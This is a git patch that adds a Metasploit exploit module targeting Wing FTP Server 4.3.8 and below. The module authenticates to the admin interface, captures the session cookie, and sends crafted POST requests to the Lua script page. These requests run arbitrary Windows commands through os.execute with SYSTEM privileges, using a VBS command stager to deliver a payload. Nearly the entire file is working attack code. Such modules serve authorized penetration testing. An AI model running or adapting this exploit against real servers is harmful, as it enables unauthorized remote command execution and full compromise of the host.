From 40b66fae33dbda2b27f102fcd60f33c3e2ebb918 Mon Sep 17 00:00:00 2001 From: Nicholas Nam Date: Tue, 26 Aug 2014 07:28:41 -0700 Subject: [PATCH] Add Wing FTP Server post-auth remote command execution module --- .../windows/ftp/wing_ftp_server_rce.rb | 123 ++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 modules/exploits/windows/ftp/wing_ftp_server_rce.rb diff --git a/modules/exploits/windows/ftp/wing_ftp_server_rce.rb b/modules/exploits/windows/ftp/wing_ftp_server_rce.rb new file mode 100644 index 0000000000..b3c9df2c2c --- /dev/null +++ b/modules/exploits/windows/ftp/wing_ftp_server_rce.rb @@ -0,0 +1,123 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/powershell' + +class Metasploit3 < Msf::Exploit::Remote + include REXML + include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wing FTP Server Remote Command Execution', + 'Description' => %q{ + This module exploits the embedded Lua interpreter in the admin interface for + versions 4.3.8 and below. When supplying a specially crafted HTTP POST request + an attacker can use os.execute() to execute arbitrary system commands on + the target with SYSTEM privileges. + }, + 'Author' => + [ + 'Nicholas Nam (nick[at]executionflow.org)', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.wftpserver.com' ] + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows VBS Stager', {} ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jun 19 2014', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(5466), + OptString.new('USERNAME', [true, 'Admin username', '']), + OptString.new('PASSWORD', [true, 'Admin password', '']) + ], self.class + ) + deregister_options('CMDSTAGER::FLAVOR') + end + + def check + res = send_request_cgi( + { + 'uri' => '/admin_login.html', + 'method' => 'GET', + }) + + if res and res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 wftpserver.com<\/b>/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + @session_cookie = authenticate(username, password) + + print_status("#{peer} - Sending payload") + # Execute the cmdstager, max length of the commands is ~1500 + execute_cmdstager({:flavor => :vbs, :linemax => 1500}) + end + + def execute_command(cmd, opts = {}) + command = "os.execute('cmd /c #{cmd}')" + + res = send_request_cgi({ + 'uri' => '/admin_lua_script.html', + 'method' => 'POST', + 'cookie' => @session_cookie, + 'vars_post' => { 'command' => command } + }) + + if res and res.code != 200 + fail_with(Failure::Unknown, "#{peer} - Something went wrong.") + end + end + + def authenticate(username, password) + print_status("#{peer} - Authenticating") + res = send_request_cgi({ + 'uri' => '/admin_loginok.html', + 'method' => 'POST', + 'vars_post' => { + 'username' => username, + 'password' => password, + 'username_val' => username, + 'password_val' => password, + 'submit_btn' => '+Login+' + } + }) + + uidadmin = '' + if res and res.body =~ /location='main.html\?lang=english';/ + res.get_cookies.split(';').each do |cookie| + cookie.split(',').each do |value| + if value.split('=')[0] =~ /UIDADMIN/ + uidadmin = value.split('=')[1] + end + end + end + else + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + end + + return "UIDADMIN=#{uidadmin}" + end + +end +